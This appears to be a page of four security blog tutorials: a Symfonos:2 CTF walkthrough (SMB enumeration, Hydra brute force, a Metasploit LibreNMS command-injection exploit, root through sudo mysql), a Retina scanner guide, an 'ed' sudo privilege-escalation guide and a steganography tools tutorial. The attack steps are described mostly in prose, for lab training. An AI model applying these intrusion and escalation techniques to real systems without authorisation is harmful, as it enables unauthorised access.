Symfonos:2 Vulnhub Walkthrough

Today we are going to take another CTF challenge from the series of Symfonos. The credit for making this VM machine goes to “Zayotic” and it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

  1. Scanning
  • NMAP
  1. Enumeration
  • Enum4Linux
  1. Exploitation
  • Smbclient
  • Hydra
  • Msfconsole
  1. Privilege Escalation
  • Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.102 automatically from our local wifi network.

Then we used Nmap for port enumeration. We found that port 21,22, 80,139 and 445 are open.

Enumeration:

As port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage. We also tried dirb and other directory brute-forcing tools but couldn’t find anything.

For further enumeration, we used Enum4Linux tool and found some useful information. We found a shared directory named anonymous.

To confirm our finding we took the help of smbclient with an empty password to list the shared resources of the target machine and got the same result.

Inside the anonymous directory, there is another directory named backups. Inside the backups directory, we got a log.txt file. So we downloaded the same file with get command.

After opening the log.txt file in our local machine we got a username aeolus.

Exploitation:

So far we have got a username aeolus, so we tried to bruteforce it with hydra and after a long wait we successfully got a password sergiotaemo.

Now we have a username and a password and we already know that there ssh service running on the target machine. We tried to ssh login the target using msfconsole and were successfully able to do so.

From the ifconfig command, we got a little hint that the target machine is listening on the localhost IP only.

So we used netstat command to check for the IP address and ports the target machine is listening on and found that web service (8080) is allowed for localhost only.

So what we did is we used port forwarding to access the port 8080 of the target.

After that, we were able to access the web service running on port 8080. On the webpage, we found it is running a LibreNMS web application.

We searched for any exploit available for the LibreNMS application in Metasploit and found one command injection exploit available.

Using this exploit we were able to get a meterpreter session of the user LibreNMS.

Privilege Escalation:

To get to the root shell we checked for the sudoer permissions for the librenms user and found that this user can run mysql command with no password. So we leveraged this to our advantage and run /bin/sh to get the root shell.

Once we got the root shell we traversed to the root directory and opened the proof.txt file to complete the challenge.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

Retina: A Network Scanning Tool

In this article, we will learn how to use retina, “a vulnerability scanner” to our best of advantage. There are various network vulnerability scanners, but Retina is the industry’s most powerful and effective vulnerability scanners. This network vulnerability scanning tool gives vulnerability assessment experience and generates full brief network vulnerability report.

Table of content

  • Introduction to Retina
  • Scanning process
  • Working of Retina
  • Network scanning with retina
  • Conclusion

Introduction to Retina

Retina network scanner allows you to scan multiple platforms. It also provides you with automatic fixes and the ability to create your own audits. It works against all the critical vulnerabilities hence, allowing you to secure your network properly. As it keeps updating its database at the beginning of every session, it is pretty reliable. Retina permits you to scan parallelly by using its queuing system to scan up to 256 targets at the same time. You can also execute the majority of scans without administrative rights. It also allows you to perform custom audit scans to enhance your internal security policies. Retina Network Security Scanner is an outstanding solution designed to discover profile and assess all assets deployed on an organization’s network. With Retina Network Security Scanner, customers can efficiently identify, prioritize and remediate vulnerabilities such as missing patches and configuration weaknesses.

Scanning Process

For a scan to begin the specific details to the retina through its GUI. As soon as the scanner will receive the scanning details, it will begin the auditing process. An audit scan covers the following :

  • Targeting : builds a scan list from the address group and discovery options
  • Port scanning : finds out all the open, closed and filtered ports
  • Detecting OS : lets you know about the OS on the target system
  • Auditing : accesses vulnerabilities of each port and their respective services.

Working of Retina

First Retina recovers the list of IPs that need to be filtered then it builds and composes its target list to the eeye_ groups table. The worklist contains the work to begin and halt data. Retina at that point starts running the scan. Once targets are filtered, then the completed passages are evacuated from the line record. In case it’s powered down for any reason, this guarantees that a filter will total. At the conclusion of the check, the scanner composes Completed to the eeye_groups table within the filter comes about the database (RTD). Suppose the client prematurely ends the work, then the scanner composes Prematurely ended to that table.

Network scanning with Retina

We have downloaded the Retina Vulnerability Scanner from the Offical Site. After Downloading the correct version with respect to our machine, we have installed the scanner through the setup. It is a fairly simple setup to install. After installation, we will run the application which results us by providing 3 tabs, i.e. “Audit, Remediate and Report”. First, we will work upon the Audit tab, inside which we have selected “Single-use” after that we are scanning an individual target in Target Type. We will use the IP Address for the target. In the case of “Multiple-use”, we can use a specific IP range too.

After selecting the Target, we must select the port that we want to scan, we have multiple options like, all ports, Common Ports, Discovery Ports, and others. In our scenario, we have selected “All ports”.

After selecting the ports, it’s time to select the type of audit, which we want to perform on our target machine. This includes many types with an option to modify. We can craft a personalized audit with the help of options provided. We selected “All Audits”. This took more time in performing the scan, but the personalized scan will take less time.

Now, we got the Options. Here, we have a choice to select some additional functionality that we can include in our scan. This includes OS Detection, Reverse DNS, NetBIOS Name, MAC Address and others. We can also provide the number of users that we want to enumerate.

Now, we run the scanner, by clicking on the “Scan” button. After hitting the Scan button, the scan starts running and we can see the details of the Scan in Active tab of the Scan Job Section. Here we can see that name of the server “Metasploitable” and the Operating System is “Ubuntu 8.04”. We also can see other details of the scan.

Now we move on to the “Remediate Tab”, here in the Configuration Section we can see the Vulnerabilities that were found and we have the option to sort out the Vulnerabilities based on the Name, Category and other criteria. Also, in the case of multiple devices, we can generate report sorted by the individual IP address

Next, we will move towards the “Report Tab”.  In this, we can select more option to refine our report. This includes sections like Scan Summary, Vulnerabilities by Category, Top Vulnerabilities, Top Open Ports etc. Apart from this, we can also select the type of report that we want. In the below image I have chosen an “Executive Report”.

As you can see from below image we have gained with multiple choices to choose from the Report Type that listed us with many options such as: “Summary Report, Vulnerability Export Report, Access Report, Dashboard Report, etc.” This is one of the most vital features that give Retina an edge in the market of Vulnerability Scanners.

Here, in our practical, we have chosen the ‘Executive’ report type as it is the one which is most commonly used in the IT industry. You can see in the above image that, the report will cover all the major sections which are scan summary, top vulnerabilities, and open ports and all the important information that is required.

Once the report is generated, you can open it in the browser as shown in the image below. It will record the date and time of the scans and report for you too.

Everything in the report will be catalogued for your convenience and the title will be shown in the index as shown below. It will start by showing all the top vulnerabilities in all the way to the bottoms ones.

First in the report is “scan metrics” which gives a brief overview of the scan. This overview will inform you about how many vulnerabilities are exploitable and will also rate the vulnerabilities for you from low to high. It will also show you the time taken by the scan with the exact start and end time.

And further, it will categorise all the vulnerabilities with their basic information just as it’s shown in the image below:

Then it will show you the top 20 vulnerabilities with their name, rise and information along with their count.

Further, it will show you the bottom 20 vulnerabilities with their names and other information.

Then, as catalogued it will go on to showing you the top twenty open ports with their names, port number and service. It also includes count which helps to tell the total no. of ports that are running in the same service.

And then it tells you about the operating system on the target machine. Which is quite necessary information as it helps you to formulate attack or security policy.

Conclusion

Since the launch of Retina Vulnerability Scanner in 1998, the Beyond Trust Network states that it has sold over 10,000 copies of the Scanner. The Retina Vulnerability Scanner is one of the scanners that have an edge over other scanners as it continuously monitors and improves their scanner with the enterprise security posture. It is the most sophisticated vulnerability assessment solution on the market that is available as a standalone application, a host-based option, or as part of the Retina CS enterprise vulnerability management solution, Retina Network Security Scanner enables you to efficiently identify IT exposures and prioritize remediation enterprise-wide

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

Linux for Pentester: ed Privilege Escalation

Here in this article, we are going to introduce a line-oriented text editor command i.e. “ed” which is used to generate, display, alter and operate text files. All ed commands operate on whole lines or ranges of lines; e.g., the “d” command deletes lines; the “m” command moves lines, “t” command copy the lines and so on, therefore, now we will check that how we can successfully execute our task of Privilege Escalation by accomplishing all these significant of “ed” command.

Table of Content

Overview to ed                               

  • Summary to ed
  • Primary Action attained using ed

Abusing ed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

Summary to ed

ed command in Linux is used for initiation of the “ed text editor” which is a line-based text editor. Its minimal interface tendency makes it less complex for working on text files. It helps user to perform many operations like creating, editing, displaying and manipulating the files.

Editing is done in two distinct modes: “command and input”. In the “command” mode “ed” reads command from the standard input and execute to manipulate the contents of the editor buffer whereas when an input command, such as ‘m’ (move), ‘d’ (delete), ‘t’ (copy) or ‘c’ (change), is given, ed enters for its “input mode”.

It is the oldest editor which was developed in 1969 in the UNIX and is succeeded by vi and emacs text editor.

Now type its help command to know more about “ed”.

Fundamental activities achieved by “ed”: As we know “ed” does many operations so now we will go through to its entire functionality one by one.

Initializing file with ed: At the initial phase, the terminal space will seem to be like as below image when the command is run . By default, the editor creates an empty buffer to write, similar to the way any other command-line based editor works when you invoke it without a file name.

Now we will start to create a text file that contains some text within it. For doing so very first we will press ‘a’ before entering anything to the file and once we accomplished our task of writing we will enter a period (.) to signify this to the editor.

Note: The main thing that needs to remember is to use ‘a’ (initial) and ‘.’ (Final) as the ways to enter and exit the insert mode. Now, to save the buffer in a file, use ‘w’ followed by a file name of own choice which helps to save the file by the desired name as well as will also display the total no. of bytes that a file contains, and then ‘q’ to quit the editor.

For the confirmation of your created file i.e. whether it has been created or not you can recheck it by using “cat” command.

Edit the file with ed: Now, in case you need to edit the same file again, then it can simply be done by passing the name of the file as an argument to the ed command, and then following the same procedure as discussed above.

Here in the below image, I’m adding one more line to my file “info.txt” which I have created above by following the same process.

Note Every time we need to use ‘a’, ‘.’, ‘w’, ‘q’ command whenever we use any option of ed command.

Change any specific line: Till now we have learnt basic editing using ed, now let’s move ahead to discuss more editing aspects by using ed. For example, if we want to make changes in a specific line then how we can attain that operation using ed.

Here in the below image, it has been shown how we can print any particular line using argument ‘p’ and ‘n’

When we type ‘p’ it gives us the current line at which the control is currently, while on using ‘n’ it gives us the line number as well.

So after typing ‘n’ we simply need to mention that line no. for which we want alteration. By default ‘n’ displays the last line of the file so after that you can type the line no. as per your search.

Once you achieved the line where you want to make a change, then you can enter ‘c’ to change that line by typing the text again. For example, I have changed the 5th line which is the last line of my file, by adding some more detail to it. To recheck my modification I have read my file by using ‘cat’ command and will save the file by following the same process.

Display error message by the use of ed: When you type something which ed can’t understand, it displays a question mark (?) by default. To know more about where you have mistaken ed provides a very helpful option i.e. ‘h’.

As from below screenshot it can be clearly understood that when I have used ‘b’ option it gave me (?) which is the symbol of error and while typing ‘h’ ed has displayed the error message as an unknown command for option ‘b’.

Copy and move operation by ed: Apart from all above discussed function ed also gives the option for copy and paste a line at some other location, in this case, we use ’t’ command to copy the line and ‘m’ to move any line. You need to precede’t’ with the line number to which you want to copy and append the destination line number. For example, as in the below image, I have copied the 5th line to position 0 and will save changes.

In above-mentioned command 5 is representing to the line which needs to copy and 0 is representing to the line no. for where it needs to be copied.

Note: One can also use’ instead of ‘t’ if he/she wants to move the line to another place.

Search operation using ed: Searching for any line by its keyword can be easily done by ed.  For doing so first we will use “-p%” followed by ed which will prompt you further for your search mission. After that to search forward, enter/followed by the search keyword. The moment at which you press enter, the editor will display the first line (containing the keyword) it encounters. You can run that command again to continue searching.

Here in below image ed has printed only those line as output which consists search keywords i.e. misconfiguration and Linux.

Exploiting ed

Sudo Rights Lab setups for Privilege Escalation

Now we will start to perform privilege escalation for “ed”. For doing so we need to set up our lab of ed command with administrative rights. After that, we will check for the “ed command” that what effect it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root.

To add sudo right open /sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

Now we will start exploiting ed service by taking the privilege of sudoer’s permission. For this, we need sessions of the victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the ed command as “root” without a password.

Now after knowing the fact that test user attains sudo rights so, taking this benefit here we can use ed command to access empty buffer to call bash/sh shell, with higher privileges if permitted on sudo.

Conclusion: Hence we have efficaciously exploited “ed” by attaining its functionality after granting higher privilege.  

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Steganography: The Art of Concealing

In this post, we will introduce the multiple ways for hiding any text that are based on Audio, Image, Video and White text. For achieving this we will use a method that is known as “Steganography”. The term steganography refers to the technique of hiding secret data within an ordinary, non-secret, file or message in order to avoid detection. So here we will check all those methods that can help us for doing the same.

Table of Content

Introduction

Purpose of steganography

Methods of steganography

  • Audio-based steganography
  • Image-based steganography
  • Video-based steganography
  • White text Steganography

Introduction

Steganography is the practice of hiding a file, message, image or video in another file like message video or audio. In general, the hidden message seems like something else like pictures, articles and sometimes shopping list. While the practice of encryption is to protect the content of a message alone, the style of steganography both concerns the disclosure and content of a secret message. Steganography covers data concealed in computer files. So, let’s understand this in a better way with the examples. First, let’s understand what is the purpose of steganography.

Purpose of Steganography

Effective communication is steganography. At first, you can encrypt and hide a private file inside a picture of another file type before sending it to somebody else. The likelihood of being intercepted will reduce. If you send any encrypted file to someone the other person will try to decrypt it in many ways and possibly, he will be able to do so. But in this case, it will reflect like a normal image and the other person will have no hint that what can be there on the other side of the picture. So, it is always a better and safe way of communication for those organisations where they want to protect their selves from these kinds of attacks.

So, let’s start and see how it works.

Audio Steganography

First, we will install a software named deep sound which is meant to convert all our audio files to some other format files. For installation please visit the link given below

https://deepsound.en.uptodown.com/windows

Conceal Approach: Now open the application and click on open carrier files and select an mp3 file behind which you want to conceal the original file.

Here we have selected an audio file behind which we will hide the data as we have done.

After selecting the file, we will now click on add secret file and give any file here which we want to conceal. Here we have opted for a document file.

Here you can further add one more extra security layer which is encoding by putting a password to the file. As you can see that we have given 123 as a password without which it won’t be possible for the other person to open the file.

The file is created successfully.

Now we can share this mp3 file with the other person to continue the hidden communication in the network.

Reveal Approach: The person also needs to open this with the same password which we had given for encoding. As the other person enters the password, he will be able to see the concealed content of the file by clicking on extract files.

As the other person enters the password, he will be able to see the concealed content of the file by clicking on extract files and the doc file is extracted successfully. So, by this tool, we have successfully concealed our doc file behind the mp3 file.

Image Steganography

Let’s now hide some text file behind an image file. So, we have installed the next tool which is OpenStego.

Conceal Approach:  we will first select the doc file which we want to hide after that we will add the image file behind which we will conceal the doc file and then we will choose a password and the concealed file is created.

Reveal Approach: Now we will extract the doc file by adding the image and then giving the right password and we have extracted the doc file.

Video Steganography

Now let’s see how we can hide anything behind a Video file. For this, we will install the tool Our secret from the link given here.

https://oursecret.soft112.com/

Once it is downloaded successfully. We will now be trying to conceal a doc file behind a video file.

Let’s start.

Hide: So first we will select a video which went to send. So, by clicking on select a carrier file we will choose our video and then that file which we want to hide and then giving it a password and click on hide and our new file is created.

Unhide: Now we will try to open this file with the same tool for unhiding and it will ask for the password. Once you will enter the password, we will get the concealed file here.

Text Steganography

Now we are moving towards a new idea of steganography which is white space steganography. In this kind of steganography, we will hide text behind the text which will be not possible for anyone to judge. For this, we will visit a website

www.spammimimc.com

Conceal Approach: Here we will click on encode and add the text which you want to hide and click on encode.

As you clicked on encode you will see that a new text encoded file is created.

Reveal Approach: To decode this encoded text, we will copy this text and paste it in the box given and click on decode.

And finally, you will get the message which was hidden behind that.

Another Method

Conceal Approach: That’s not all! We can also send this message as an excel file which is hard to detect for anyone. To use this feature, we will click on “encode as a spreadsheet” and enter the text which you want to conceal and click on encode.

Then this generates a new excel file to conceal our “secret message” behind its record.

When we open this excel file it seems a very normal excel file by which no one will get to know the real message behind that.

Reveal: But as we know that there is a hidden file behind this so we will decode this. So first click on decode fake spreadsheet.

Now paste the sheet which we want to decode in the column and click on decode.

Now you will get the real hidden message which was there behind this excel file as we got successfully.

So, it’s very clear that there are several ways of sending safe secret messages by the art of steganography.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information SecurityContact here